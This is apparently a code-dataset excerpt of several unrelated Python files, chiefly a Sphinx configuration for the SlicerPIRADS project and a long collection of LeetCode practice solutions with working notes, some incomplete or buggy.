        r = hash_str("3", 100)
        self.assertLess(len(r), 100)
unittest.main()
| 33.074074 | 90 | 0.553751 |
79545c51506d256eebead2a69e5dce132987671c | 5,951 | py | Python | docs/conf.py | SlicerProstate/SlicerPIRADS | b160dc547a955f2d20f52b7247d39d4de21eaa8e | [
"BSD-3-Clause"
] | null | null | null | docs/conf.py | SlicerProstate/SlicerPIRADS | b160dc547a955f2d20f52b7247d39d4de21eaa8e | [
"BSD-3-Clause"
] | 8 | 2018-03-19T14:18:15.000Z | 2018-08-02T20:45:15.000Z | docs/conf.py | SlicerProstate/SlicerPIRADS | b160dc547a955f2d20f52b7247d39d4de21eaa8e | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.join(os.path.abspath('../SlicerPIRADS')))
from mock import Mock as MagicMock
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return Mock()
def __mul__(self, other):
return Mock()
def __rmul__(self, other):
return Mock()
def __pow__(self, other):
return Mock()
def __div__(self, other):
return Mock()
def __add__(self, other):
return Mock()
def __radd__(self, other):
return Mock()
MOCK_MODULES = ['vtk', 'SegmentEditor']
for mod_name in MOCK_MODULES:
sys.modules[mod_name] = Mock()
autodoc_mock_imports = ['qt', 'DICOMLib', 'slicer', 'vtk.vtkCommand.UserEvent', 'ctk', 'SimpleITK', 'sitkUtils',
'qSlicerMultiVolumeExplorerModuleWidget', 'qSlicerMultiVolumeExplorerModuleHelper',
'SlicerDevelopmentToolboxUtils', 'DICOMQIICRXLoaderPlugin', 'SlicerLayoutButtons']
# -- Project information -----------------------------------------------------
project = u'SlicerPIRADS'
copyright = u'2018, Christian Herz (SPL), Andrey Fedorov (SPL)'
author = u'Christian Herz (SPL), Andrey Fedorov (SPL)'
# The short X.Y version
version = u''
# The full version, including alpha/beta/rc tags
release = u'0.1'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinxcontrib.napoleon'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = ['Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'SlicerPIRADSdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'SlicerPIRADS.tex', u'SlicerPIRADS Documentation',
u'Christian Herz (SPL), Andrey Fedorov (SPL)', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'slicerpirads', u'SlicerPIRADS Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'SlicerPIRADS', u'SlicerPIRADS Documentation',
author, 'SlicerPIRADS', 'One line description of project.',
'Miscellaneous'),
]
# -- Extension configuration ------------------------------------------------- | 31.321053 | 112 | 0.658713 |
79545df342f8d31fe948ee54ee86bbfe38a41753 | 307 | py | Python | test/run_all_tests.py | dchampion/crypto | 1d48e84fd14bbb489c53296e145c1dee10c4d39c | [
"MIT"
] | null | null | null | test/run_all_tests.py | dchampion/crypto | 1d48e84fd14bbb489c53296e145c1dee10c4d39c | [
"MIT"
] | null | null | null | test/run_all_tests.py | dchampion/crypto | 1d48e84fd14bbb489c53296e145c1dee10c4d39c | [
"MIT"
] | null | null | null | import dh_test
import euclid_test
import primes_test
import rsa_test
import util_test
def main():
    """Run every test module's entry point in sequence.

    Each module is expected to assert internally; reaching the final print
    means no test raised.
    """
    print("Running all tests...")
    dh_test.main()
    euclid_test.main()
    primes_test.main()
    rsa_test.main()
    util_test.main()
    print("all tests passed")
main() | 18.058824 | 33 | 0.684039 |
79545f4e0b96697e4cb43fc7ad9e993e39ab3078 | 439 | py | Python | tools/remoteaccess/tests/03-read.py | zxpower/MansOS | 1130f54357649eb25020951951d9a5963e755c66 | [
"MIT"
] | 10 | 2015-10-14T12:35:50.000Z | 2022-02-20T12:24:36.000Z | tools/remoteaccess/tests/03-read.py | zxpower/MansOS | 1130f54357649eb25020951951d9a5963e755c66 | [
"MIT"
] | 13 | 2015-11-24T03:25:08.000Z | 2017-02-08T09:15:45.000Z | tools/remoteaccess/tests/03-read.py | zxpower/MansOS | 1130f54357649eb25020951951d9a5963e755c66 | [
"MIT"
] | 7 | 2015-10-15T07:53:52.000Z | 2020-12-15T00:15:49.000Z | #!/usr/bin/env python
# Get data
import os, sys, time
import urllib2
def main():
    """Issue an HTTP read request to the remote-access server and print the reply.

    NOTE(review): Python 2 code (``urllib2``). Returns 1 on failure and
    implicitly None on success.
    """
    host = "http://localhost:30001/read?port=/dev/ttyUSB0"
    # host = "http://10.0.0.1:30001/read?port=/dev/ttyUSB0"
    try:
        req = urllib2.urlopen(host)
        print("Reply data:")
        print(req.read())
    except Exception as e:
        print("exception occurred:")
        print(e)
        return 1
main()
| 19.954545 | 58 | 0.587699 |
79545fcc9e9aac696bc8f6fc6290c65301ce3933 | 91,085 | py | Python | Ninja/leetcode.py | cyandterry/Python-Study | b40e6c4db10da417e72247f61146f7570621106a | [
"MIT"
] | 61 | 2015-02-03T20:25:55.000Z | 2021-05-17T19:33:40.000Z | Ninja/leetcode.py | cyandterry/Python-Study | b40e6c4db10da417e72247f61146f7570621106a | [
"MIT"
] | null | null | null | Ninja/leetcode.py | cyandterry/Python-Study | b40e6c4db10da417e72247f61146f7570621106a | [
"MIT"
] | 37 | 2015-02-04T07:12:52.000Z | 2020-05-16T18:47:16.000Z | #!/usr/bin/env python
# 1.Single Number
# Fuck!!! use XOR
def single_number(num_list):
    """Return the element that appears an odd number of times (LeetCode 136).

    XOR of all elements cancels paired values. Fixes the original's missing
    ':' on the for statement (a syntax error) and drops the pointless
    ``None`` check and in-place mutation of ``num_list[0]``.
    """
    result = 0
    for num in num_list:
        result ^= num
    return result
# 2. Maximum depth of binary tree
def maximum_depth(root):
    """Depth of a binary tree; an empty tree has depth 0."""
    if root is None:
        return 0
    left_depth = maximum_depth(root.left)
    right_depth = maximum_depth(root.right)
    return 1 + max(left_depth, right_depth)
# 3. Same Tree
def is_same_tree(p, q):
    """True iff two binary trees have identical structure and node data."""
    if p is None or q is None:
        # Only equal if both ran out of nodes at the same time.
        return p is q
    return (p.data == q.data
            and is_same_tree(p.left, q.left)
            and is_same_tree(p.right, q.right))
# 4.Reverse Integer
def reverse(x):
    """Reverse the decimal digits of an integer, preserving sign (LeetCode 7).

    Fixes the Python 3 pitfall in the original: ``x /= 10`` yields a float,
    so the loop degenerated; ``//=`` keeps integer arithmetic.
    """
    if x < 0:
        return -reverse(-x)
    res = 0
    while x > 0:
        res = res * 10 + x % 10
        x //= 10
    return res
def reverse_int(num):
    """Reverse an integer's decimal digits, preserving sign.

    Same contract as ``reverse`` above, implemented by collecting digits.
    Fixes the original's ``num /= 10`` (float division on Python 3) and
    replaces the 10**weight accumulation with a simple fold.
    """
    sign = -1 if num < 0 else 1
    num = abs(num)
    digits = []                    # least-significant digit first
    while num > 0:
        digits.append(num % 10)
        num //= 10
    result = 0
    for digit in digits:
        result = result * 10 + digit
    return sign * result
# 5. Unique Binary Search tree
def unique_bst(num):
    """Number of structurally unique BSTs storing values 1..num (LeetCode 96)."""
    if num <= 1:
        return num
    return unique_bst_helper(1, num)

def unique_bst_helper(start, end):
    """Count the unique BSTs over the value range [start, end]."""
    if start >= end:
        # Empty or single-value range: exactly one shape.
        return 1
    total = 0
    for root in range(start, end + 1):
        left_count = unique_bst_helper(start, root - 1)
        right_count = unique_bst_helper(root + 1, end)
        total += left_count * right_count
    return total
# 6. Best time to buy and sell
def stock_buy_sell(stock_list):
    """Max total profit with unlimited transactions (LeetCode 122).

    Summing every positive day-to-day increase is equivalent to buying
    before each rise and selling at each local peak. Fixes the original's
    ``stack_empty`` typo and its missing ``return``; also handles empty input.
    """
    profit = 0
    for prev, cur in zip(stock_list, stock_list[1:]):
        if cur > prev:
            profit += cur - prev
    return profit
profit += pre_price - buy_price
# 7. Linked List Cycle
def list_cycle(head):
    """Return the node where a linked-list cycle begins, or None (LeetCode 142).

    Floyd's algorithm. The original compared slow/fast before moving them
    (both start at head, so the first loop never ran) and had no guard for
    acyclic lists.
    """
    slow = fast = head
    while fast is not None and fast.next is not None:
        slow = slow.next
        fast = fast.next.next
        if slow is fast:
            # Phase 2: restart one pointer at head; they meet at cycle start.
            fast = head
            while slow is not fast:
                slow = slow.next
                fast = fast.next
            return fast
    return None
# 8. BT Inorder traversal
# Iterative way
def inorder_traversal(root):
    """Iterative in-order traversal; returns the list of node values."""
    res = []
    stack = []
    node = root
    while node is not None or stack:
        # Slide down the left spine, then visit and turn right.
        while node is not None:
            stack.append(node)
            node = node.left
        node = stack.pop()
        res.append(node.val)
        node = node.right
    return res
def inorder_traversal(root):
    # Recursive in-order: left subtree, node, right subtree.
    # NOTE: Python 2 print statement; this variant prints instead of
    # returning values and shadows the iterative version above.
    if root is None:
        return
    inorder_traversal(root.left)
    print root.data
    inorder_traversal(root.right)
# 9. BT Preorder traversal
# Iterative way
def preorder_traversal(root):
    """Iterative pre-order traversal; returns the list of node values.

    Fixes the original, which appended to a ``res`` list it never created.
    """
    res = []
    stack = []
    current = root
    while current is not None or len(stack) > 0:
        if current is not None:
            res.append(current.val)   # visit before descending left
            stack.append(current)
            current = current.left
        else:
            current = stack.pop()
            current = current.right
    return res
def preorder_traversal(root):
    # Recursive pre-order: node, left subtree, right subtree.
    # NOTE: Python 2 print statement; shadows the iterative version above.
    if root is None:
        return
    print root.data
    preorder_traversal(root.left)
    preorder_traversal(root.right)
# 10. Populate Next right poiters in each node
# This is a bit hard to think
def next_right_pointer(root):
    # Link each node's ``next`` to its right neighbour on the same level.
    # NOTE(review): relies on ``next`` already being set on the level above
    # and appears to assume a perfect binary tree (LeetCode 116) -- confirm
    # before using on arbitrary trees.
    if root is None:
        return
    if root.left is not None:
        root.left.next = root.right
    if root.right is not None and root.next is not None:
        # Bridge across siblings via the parent's next pointer.
        root.right.next = root.next.left
    next_right_pointer(root.left)
    next_right_pointer(root.right)
"""
Need to validate if this is correct
def next_right_pointer(root):
if root is None:
return
left = root.left
right = root.right
if left is not None and right is not None:
left.next = right
while left.right is not None:
left = left.right
right = right.left
left.next = right
next_right_pointer(root.left)
next_right_pointer(root.right)
"""
# Not using recursive, but also using extra space, so not a good result
def next_right_pointer(root):
    """Level-order version: link each node's ``next`` to its right neighbour.

    Fixes two bugs in the original: it assigned the whole level list
    (``prev[i-1].next = prev``) instead of ``prev[i]``, and referenced an
    undefined ``node`` when collecting children. Uses O(width) extra space.
    """
    if root is None:
        return
    prev = [root]
    while len(prev) > 0:
        # Wire up this level left-to-right; rightmost node ends the chain.
        for i in range(1, len(prev)):
            prev[i - 1].next = prev[i]
        prev[-1].next = None
        current = []
        for node in prev:
            if node.left is not None:
                current.append(node.left)
            if node.right is not None:
                current.append(node.right)
        prev = current
    return root
# 11. Search Insert Position
# This is a O(n) method, need to think about something for O(log(n))
def searchInsert(A, target):
    """Index of target in sorted A, or where it would be inserted (LeetCode 35).

    O(log n) binary search. Fixes ``(start + end) / 2``: on Python 3 that is
    float division, making ``A[mid]`` raise TypeError; use ``//``.
    """
    start = 0
    end = len(A) - 1
    while start <= end:
        mid = (start + end) // 2
        if A[mid] == target:
            return mid
        elif A[mid] < target:   # target is in the upper half
            start = mid + 1
        else:
            end = mid - 1
    return start
# Too easy way, not the way wanted
def searchInsert_2(A, target):
    """Linear-scan variant: first index whose value is >= target."""
    index = 0
    for num in A:
        if target <= num:
            return index
        index += 1
    # target is larger than everything: append position.
    return index
"""
Guess these two are not the best ways
def search_insert_position_1(num_list, num):
i = 0
while i <= len(num_list)-1:
if num <= num_list[i]:
return i
i += 1
return i
# No need to use recursive
def search_insert_position(num_list, num, start, end):
if start > end:
return start
mid = (start + end) / 2
if num_list[mid] == num:
return mid
elif num_list[mid] > num:
return search_insert_position(num_list, num, start, mid-1)
else:
return search_insert_position(num_list, num, mid+1, end)
"""
# 12. Remove Duplicates from Sorted List:
def deleteDuplicates(self, head):
    """Collapse runs of equal values in a sorted linked list (LeetCode 83)."""
    node = head
    # Folding the None/next-is-None guards into the loop condition covers
    # the empty and single-node cases too.
    while node is not None and node.next is not None:
        if node.val == node.next.val:
            node.next = node.next.next
        else:
            node = node.next
    return head
"""
No need to use prev
def remove_duplicates(head):
if head is None or head.next is None:
return head
prev = head
current = head.next
while current is not None:
if prev.data == current.data:
prev.next = current.next
else:
prev = current
currnet = current.next
return head
"""
# 13. Climbing Stairs
# Fuck you remember the num <= 2
# There's a way not to use recursive
def climb_stairs(num):
    """Distinct ways to climb ``num`` stairs taking 1 or 2 steps (LeetCode 70).

    The answer is the Fibonacci recurrence; the original's naive recursion
    was O(2^n). Same results, computed iteratively in O(n).
    """
    if num <= 2:
        return num
    a, b = 1, 2
    for _ in range(num - 2):
        a, b = b, a + b
    return b
# 14. Maximum Subarray
# important is the way to think this shit!!!
def maximum_subarray(array):
    """Largest sum of any contiguous subarray (Kadane's algorithm, LeetCode 53).

    The original referenced an undefined ``MIN_INT``; seed the best value
    from the first element instead, which also handles all-negative input.
    """
    best = array[0]
    running = 0
    for num in array:
        running += num
        best = max(best, running)
        if running < 0:
            # A negative prefix can only hurt; restart the window.
            running = 0
    return best
# dp way
# dp[i] = max(A[i], dp[i-1]+A[i])
# Note here it's A[i] not dp
# Because we don't need to store dp[i], so simplify to dp
def maxSubArray_2(self, A):
    """DP variant: track the best subarray sum ending at each element."""
    best = current = A[0]
    for num in A[1:]:
        # Extend the previous run only if it is still non-negative.
        current = num if current < 0 else current + num
        best = max(best, current)
    return best
# 15. Roman to Integer
def roman_2_integer(roman):
    """Convert a Roman numeral string to an integer (LeetCode 13)."""
    values = {'I': 1, 'V': 5, 'X': 10, 'L': 50,
              'C': 100, 'D': 500, 'M': 1000}
    total = 0
    prev = 0
    for ch in roman:
        cur = values[ch]
        if cur > prev:
            # Subtractive pair (IV, IX, ...): undo the smaller value twice.
            total += cur - 2 * prev
        else:
            total += cur
        prev = cur
    return total
# 16 Single Number II
# Check later
def single_number_2(num_list, num):
    """Element appearing once where every other appears 3 times (LeetCode 137).

    Classic two-accumulator bit trick. The original iterated the element
    values and then used them as indices (``num_list[i]``); iterate the
    elements directly. ``num`` is unused but kept for interface compatibility.
    """
    one = 0
    two = 0
    for x in num_list:
        two |= one & x
        one ^= x
        # Bits seen three times are cleared from both accumulators.
        mask = one & two
        one &= ~mask
        two &= ~mask
    return one
# 17 Remove Element
def remove_element(A, elem):
    """Remove all occurrences of elem in place; return the new length."""
    write = 0
    for value in A:
        if value != elem:
            # Compact survivors to the front of the list.
            A[write] = value
            write += 1
    return write
# 18 Integer to Roman
# WOCAONIMA
def integer_2_roman(num):
    """Convert an integer (1..3999) to its Roman numeral string."""
    table = [(1000, 'M'), (900, 'CM'), (500, 'D'), (400, 'CD'),
             (100, 'C'), (90, 'XC'), (50, 'L'), (40, 'XL'),
             (10, 'X'), (9, 'IX'), (5, 'V'), (4, 'IV'), (1, 'I')]
    parts = []
    for value, symbol in table:
        # Greedy: take as many of the current symbol as fit.
        count, num = divmod(num, value)
        parts.append(symbol * count)
    return ''.join(parts)
"""
def integer_2_roman(num):
digits = [(1000, 'M'), (900, 'CM'), (500, 'D'), (400, 'CD' ),
(100, 'C'), (90, 'XC'), (50, 'L'), (40, 'XL'),
(10, 'X'), (9, 'IX'), (5, 'V'), (4, 'IV'), (1, 'I')]
result = ""
while len(digits) > 0:
(val, romn) = digits[0] # Unpacks the first pair in the list
if n < val:
digits.pop(0) # Removes first element
else:
n -= val
result += romn
return result
"""
# 19 Merge two sorted list
# Wo dou bu xiang xiang le
# Using dummy make life easier
def mergeTwoLists(l1, l2):
    """Merge two sorted linked lists; return the merged head (LeetCode 21).

    A dummy head avoids special-casing the first node.
    """
    dummy = ListNode(0)
    tail = dummy
    while l1 is not None and l2 is not None:
        if l1.val < l2.val:
            tail.next, l1 = l1, l1.next
        else:
            tail.next, l2 = l2, l2.next
        tail = tail.next
    # At most one of the lists still has nodes; append it wholesale.
    if l1 is not None:
        tail.next = l1
    if l2 is not None:
        tail.next = l2
    return dummy.next
"""
def merge_sorted_list(list1, list2):
head = None
prev = None
while list1 is not None and list2 is not None:
if head is None:
if list1.data < list2.data:
head = Node(list1.data)
list1 = list1.next
else:
head = Node(list2.data)
list2 = list2.next
prev = head
else:
if list2 is None or list1.data < list2.data:
new = Node(list1.data)
list1 = list1.next
else:
new = Node(list2.data)
list2 = list2.next
prev.next = new
prev = new
return head
"""
# 20. Balanced Binary Tree
# need to check if there's a better way
def balanced_bt(root):
    """Height-balanced check in O(n) (LeetCode 110).

    The original recomputed subtree heights at every node, O(n^2). Here a
    single pass reports each subtree's height, or -1 once any imbalance is
    found. ``get_height`` is kept unchanged for other callers.
    """
    def check(node):
        # Returns the height of ``node``, or -1 if its subtree is unbalanced.
        if node is None:
            return 0
        left = check(node.left)
        if left < 0:
            return -1
        right = check(node.right)
        if right < 0:
            return -1
        if abs(left - right) > 1:
            return -1
        return max(left, right) + 1
    return check(root) >= 0

def get_height(root):
    """Height of a binary tree; an empty tree has height 0."""
    if root is None:
        return 0
    else:
        return max(get_height(root.left), get_height(root.right)) + 1
# 21. Convert sorted array to bst
def array_to_bst(num_list):
    """Build a height-balanced BST from a sorted list (LeetCode 108).

    Fixes the original, which recursed into ``array_to_bst`` itself with
    three arguments instead of calling the helper.
    """
    if not num_list:
        return None
    return array_to_bst_helper(num_list, 0, len(num_list) - 1)

def array_to_bst_helper(num_list, start, end):
    """Recursively build the subtree for num_list[start:end + 1]."""
    if start > end:
        return None
    mid = (start + end) // 2     # '//' keeps mid an int on Python 3
    n = treeNode(num_list[mid])
    n.left = array_to_bst_helper(num_list, start, mid - 1)
    n.right = array_to_bst_helper(num_list, mid + 1, end)
    return n
# 22. Remove Duplicates from sorted array
# Remember i+1, also don't forget length check
def removeDuplicates_2(A):
    """Dedupe a sorted list in place; return the deduplicated length."""
    if len(A) <= 1:
        return len(A)
    write = 0
    for value in A[1:]:
        if value != A[write]:
            # New value: advance the write cursor and store it.
            write += 1
            A[write] = value
    return write + 1
"""
# Fuck remember it is length + 1 !!!!
def remove_duplicates_in_array(num_list):
length = 0
for i in range(1, len(num_list)):
if num_list[i] != num_list[length]:
length += 1
num_list[length] = num_list[i]
return length + 1
"""
# 23. Pascal's Triangle
# Fuck notice it's range(n-1) not n
def generate_1(numRows):
    """First numRows rows of Pascal's triangle (LeetCode 118)."""
    rows = []
    for r in range(numRows):
        row = [1]
        # Interior entries are sums of adjacent entries in the previous row.
        for c in range(1, r):
            row.append(rows[-1][c] + rows[-1][c - 1])
        if r >= 1:
            row.append(1)
        rows.append(row)
    return rows
"""
def pascal_triangle_2(n):
if n == 1:
return [1]
prev = [1]
result = [prev, ]
for i in range(n-1):
prev_copy = prev[:]
prev_copy.append(0)
prev_copy.insert(0,0)
new_line = []
# first and last num always assume 0
for i in range(1, len(prev_copy)):
new_line.append(prev_copy[i] + prev_copy[i-1])
result.append(new_line)
prev = new_line
return result
# New way to think about this. Not appending 0 at beginning but append 1, and sum every other besides last one
# this is the fucking best way to do this
def pascal_triangle(n):
if n == 1:
return [1]
prev = [1]
result = [prev,]
for i in range(n-1):
new_line = []
# appen first 1
new_line.append(1)
for j in range(1, len(prev)):
new_line.append(prev[j] + prev[j-1])
# append last 1
new_line.append(1)
result.append(new_line)
prev = new_line
return result
"""
# 24. Merge sorted array
# code will be cleaner if pthon has --
def merge_sorted_array(l1, l2):
    """Merge sorted l2 into sorted l1 in place and return l1 (LeetCode 88).

    The original wrote to index len(l1)+len(l2)-1 without growing l1, which
    raises IndexError on plain Python lists; grow l1 first, then merge from
    the back so nothing is overwritten before it is read.
    """
    end_1 = len(l1) - 1
    end_2 = len(l2) - 1
    l1.extend([0] * len(l2))        # make room for l2's elements
    end = len(l1) - 1
    while end_2 >= 0:
        if end_1 >= 0 and l1[end_1] >= l2[end_2]:
            l1[end] = l1[end_1]
            end_1 -= 1
        else:
            l1[end] = l2[end_2]
            end_2 -= 1
        end -= 1
    # Remaining l1 elements (if any) are already in place.
    return l1
# 25. Swap Nodes in Pairs
def swap_nodes(head):
    """Swap the payloads of each adjacent pair of linked-list nodes."""
    node = head
    while node is not None and node.next is not None:
        # Tuple assignment swaps the two payloads without a temp variable.
        node.data, node.next.data = node.next.data, node.data
        node = node.next.next
class Node:
    """Singly linked list node: a ``data`` payload and a ``next`` pointer."""
    def __init__(self, data):
        self.next = None
        self.data = data
def print_list(head):
    # Walk the list, printing each payload (Python 2 print statement).
    while head is not None:
        print head.data
        head = head.next
# 26. Symmetric Tree
def symmetric_tree(root):
    """True iff the tree is a mirror of itself (LeetCode 101).

    Fixes the original's call to the misspelled ``is_symetric``.
    """
    if root is None:
        return True
    return is_symmetric(root.left, root.right)

def is_symmetric(p, q):
    """True iff subtree p is the mirror image of subtree q."""
    if p is None and q is None:
        return True
    elif p is None or q is None or p.data != q.data:
        return False
    else:
        # Mirror: outer children together, inner children together.
        return is_symmetric(p.left, q.right) and is_symmetric(p.right, q.left)
# Iterative way
def isSymmetric_2(root):
    """Iterative mirror check: compare mirrored node pairs via a queue."""
    if root is None:
        return True
    queue = collections.deque()
    queue.append(root.left)
    queue.append(root.right)
    while queue:
        left = queue.popleft()
        right = queue.popleft()
        if left is None and right is None:
            continue
        if left is None or right is None or left.val != right.val:
            return False
        # Enqueue the mirrored child pairs: outer with outer, inner with inner.
        queue.append(left.left)
        queue.append(right.right)
        queue.append(left.right)
        queue.append(right.left)
    return True
# 27. Gray Code
def grayCode(n):
    """The n-bit Gray-code sequence as integers (LeetCode 89).

    i ^ (i >> 1) is the standard binary-to-Gray mapping. The original
    built ``ret`` but returned the loop counter instead.
    """
    return [i ^ (i >> 1) for i in range(2 ** n)]
# This is better than below one which is easier to remember,
# But this question, we want int instead of string binary
def grayCodeGen(n):
    """n-bit Gray code as binary strings, built by reflect-and-prefix.

    Fixes the recursive calls, which referenced a nonexistent
    ``grayCodeGen_2``. Requires n >= 1.
    """
    if n == 1:
        return ['0', '1']
    ret = []
    shorter = grayCodeGen(n - 1)
    for code in shorter:
        ret.append('0' + code)
    # Reflect: the '1'-prefixed half runs in reverse order.
    for code in reversed(shorter):
        ret.append('1' + code)
    return ret
# A easy understandable way to solve this
def graycode(numbits, reverse=False):
    """Yield numbits-bit Gray-code strings; ``reverse`` emits them backwards."""
    if numbits == 1:
        bits = ("1", "0") if reverse else ("0", "1")
        for bit in bits:
            yield bit
        return
    # The leading bit that starts the sequence depends on direction; the
    # second half always recurses with the opposite orientation.
    first, second = ("1", "0") if reverse else ("0", "1")
    for code in graycode(numbits - 1, False):
        yield first + code
    for code in graycode(numbits - 1, True):
        yield second + code
# 84. N-Queens
def n_queens(n):
    # TODO: unimplemented stub -- should return the N-Queens placements
    # for an n x n board (see is_valid below for the intended row check).
    pass
def is_valid(result, r):
    """Check that the queen in row r conflicts with no earlier row.

    ``result[i]`` is the column of row i's queen. Fixes the original
    diagonal test, which only caught one diagonal direction; compare the
    absolute column and row deltas instead.
    """
    for i in range(r):
        if result[i] == result[r] or abs(result[i] - result[r]) == abs(i - r):
            return False
    return True
# 28. N-Queens II
def n_queens_ii():
    # TODO: unimplemented stub -- should count the distinct N-Queens solutions.
    pass
# 29. Sort Colors
# Passing only once
def sort_colors(A):
    """Dutch-national-flag one-pass sort of 0/1/2 values, in place (LeetCode 75).

    Fixes two bugs: the original called an undefined ``swap`` helper, and it
    advanced ``index`` after swapping a 2 to the back even though the
    swapped-in value had not been examined yet.
    """
    index = 0
    red_index = 0
    blue_index = len(A) - 1
    while index <= blue_index:
        if A[index] == 0:   # red: move to the front
            A[index], A[red_index] = A[red_index], A[index]
            index += 1
            red_index += 1
        elif A[index] == 2: # blue: move to the back
            A[index], A[blue_index] = A[blue_index], A[index]
            blue_index -= 1 # do NOT advance index; re-examine the new A[index]
        else:
            index += 1
    return A
# Passing twice
def sort_colors(list):
    """Two-pass counting sort of 0/1/2 values; returns a new sorted list."""
    counts = [0, 0, 0]
    for color in list:
        if color == 0:
            counts[0] += 1
        elif color == 1:
            counts[1] += 1
        else:
            counts[2] += 1
    # Rebuild: all reds, then whites, then blues.
    return [0] * counts[0] + [1] * counts[1] + [2] * counts[2]
# 30. Binary Tree Level Order Traversal II
# Note: this returns a stack, in order to return a reverse one, still need to reverse them
def bt_level_traversal_ii(root):
    """Collect tree nodes level by level, root level first.

    Returns a list of levels; the caller pops entries to obtain the
    bottom-up order (LeetCode 107). Returns None for an empty tree.
    """
    if root is None:
        return
    levels = [[root]]
    frontier = [root]
    while frontier:
        nxt = []
        for node in frontier:
            if node.left is not None:
                nxt.append(node.left)
            if node.right is not None:
                nxt.append(node.right)
        if nxt:
            levels.append(nxt)
        frontier = nxt
    return levels
# 31. Permutations
# Need to fucking remember this. Divide and Conquer
def permute(num):
    """All permutations of ``num``, divide-and-conquer style (LeetCode 46)."""
    if not num:
        return [[]]
    res = []
    for i, picked in enumerate(num):
        # Permute everything except the picked element, then append it.
        remaining = num[:i] + num[i + 1:]
        for sub in permute(remaining):
            res.append(sub + [picked])
    return res
# 32. Generate Parentheses
# With simpler implementation
def generateParenthesis(n):
    """All well-formed strings of n parenthesis pairs (LeetCode 22)."""
    results = []
    generateParenthesis_helper(n, n, '', results)
    return results

def generateParenthesis_helper(left, right, partial, results):
    """DFS where ``left``/``right`` count the '(' and ')' still available."""
    if left == 0 and right == 0:
        results.append(partial[:])
        return
    if left > 0:
        generateParenthesis_helper(left - 1, right, partial + '(', results)
    # A ')' is only legal while more '(' than ')' have been emitted.
    if right > left:
        generateParenthesis_helper(left, right - 1, partial + ')', results)
"""
def parentheses_gen(n):
res = []
cand = ''
gp(n, n, cand, res)
return res
def gp(left, right, cand, res):
if left > right or left < 0:
return
elif left == 0 and right == 0:
res.append(cand)
else:
gp(left - 1, right, cand + '(', res)
gp(left, right - 1, cand + ')', res)
"""
# 33. Best time to buy and sell II
# Remember to pre check
def stock_buy_sell_I(prices):
    """Max profit from one buy followed by one sell (0 if never profitable).

    Fixes two defects: max_profit was seeded with prices[0] (reporting a
    bogus profit on flat/falling data), and the running minimum was
    assigned to a typo name (min_pirce) so it never updated.
    """
    if len(prices) < 1:
        return 0
    min_price = prices[0]
    max_profit = 0
    for price in prices:
        max_profit = max(max_profit, price - min_price)
        min_price = min(min_price, price)
    return max_profit
def stock_buy_sell_II(prices):
    """Max profit with unlimited transactions: sum every upward move.

    Fixes a NameError (`price[0]` before `price` existed) and guards the
    empty list.
    """
    if len(prices) == 0:
        return 0
    profit = 0
    prev = prices[0]
    for price in prices[1:]:
        if price >= prev:  # increasing segment: bank the gain
            profit += price - prev
        prev = price
    return profit
"""
Wrong solution
def stock_buy_sell_III(prices):
profit_2 = [0] * 2
prev = price[0]
low_price = price[0]
for price in prices[1:]:
if price < prev: # Reached high point/decreasing, calculate profit, got new low_price
profit = low_price - prev
if prev != low_price: # Means this is the high point
profit_2 = calculate_max_2(profit, profit_2)
low_price = price
prev = price
# Need to calcualte the last one
profit_2 = calculate_max_2(prev - low_price, profit_2)
return profit_2
"""
# A little bit Dynamic Programming
# 1. in-order pass: use profit = price - min_price
# 2. back-order pass: use profit = max_price - price
def stock_buy_sell_III(prices):
    """Max profit with at most two non-overlapping transactions.

    m1[i] is the best single-transaction profit within prices[:i+1];
